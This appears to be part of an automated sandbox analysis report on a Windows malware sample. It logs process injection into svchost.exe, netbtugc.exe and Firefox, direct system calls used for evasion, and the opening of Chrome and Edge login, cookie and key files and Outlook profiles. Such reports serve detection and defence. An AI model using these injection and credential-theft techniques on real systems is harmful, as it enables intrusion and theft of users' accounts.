            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h] 2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h] 2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h] 2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h] 2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h] 2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h] 2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h] 2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h] 2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h] 2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h] 2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h] 2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h] 2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h] 2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h] 2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h] 2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h] 2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h] 2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h] 2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h] 2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h] 2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h] 2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h] 2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h] 2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h] 2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h] 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h] 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h] 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h] 2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h] 2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h] 2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h] 2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h] 2_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h] 2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h] 2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h] 2_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h] 2_2_03BBE872
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C8A937 GetProcessHeap, 0_2_00C8A937
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C88E19 SetUnhandledExceptionFilter, 0_2_00C88E19
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C88E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C88E3C

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQuerySystemInformation: Direct from: 0x76F148CC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtAllocateVirtualMemory: Direct from: 0x76F148EC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQueryAttributesFile: Direct from: 0x76F12E6C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtReadVirtualMemory: Direct from: 0x76F12E8C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtCreateKey: Direct from: 0x76F12C6C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtSetInformationThread: Direct from: 0x76F12B4C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtOpenKeyEx: Direct from: 0x76F13C9C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtWriteVirtualMemory: Direct from: 0x76F1490C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtCreateUserProcess: Direct from: 0x76F1371C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtTerminateThread: Direct from: 0x76F12FCC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtCreateFile: Direct from: 0x76F12FEC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtOpenFile: Direct from: 0x76F12DCC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQueryInformationToken: Direct from: 0x76F12CAC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtAllocateVirtualMemory: Direct from: 0x76F12BEC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtDeviceIoControlFile: Direct from: 0x76F12AEC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtSetInformationThread: Direct from: 0x76F063F9
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtOpenSection: Direct from: 0x76F12E0C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtMapViewOfSection: Direct from: 0x76F12D1C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtResumeThread: Direct from: 0x76F136AC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtCreateMutant: Direct from: 0x76F135CC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtWriteVirtualMemory: Direct from: 0x76F12E3C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtNotifyChangeKey: Direct from: 0x76F13C2C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtProtectVirtualMemory: Direct from: 0x76F07B2E
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtProtectVirtualMemory: Direct from: 0x76F12F9C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtSetInformationProcess: Direct from: 0x76F12C5C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtOpenKeyEx: Direct from: 0x76F12B9C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQueryInformationProcess: Direct from: 0x76F12C26
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtResumeThread: Direct from: 0x76F12FBC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtDelayExecution: Direct from: 0x76F12DDC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtReadFile: Direct from: 0x76F12ADC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtQuerySystemInformation: Direct from: 0x76F12DFC
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe NtAllocateVirtualMemory: Direct from: 0x76F12BFC
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 7868
            Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 30A7008
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C9BE95 LogonUserW, 0_2_00C9BE95
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C6374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_00C6374E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00CA4B52 SendInput,keybd_event, 0_2_00CA4B52
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00CA7DD5 mouse_event, 0_2_00CA7DD5
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C9B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00C9B398
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C9BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C9BE31
            Source: 3T-ENQ-O-2024-10856.exe, CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C87254 cpuid 0_2_00C87254
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C840DA GetSystemTimeAsFileTime,__aulldiv, 0_2_00C840DA
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00CDC146 GetUserNameW, 0_2_00CDC146
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C92C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00C92C3C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00C7E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00C7E47B

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
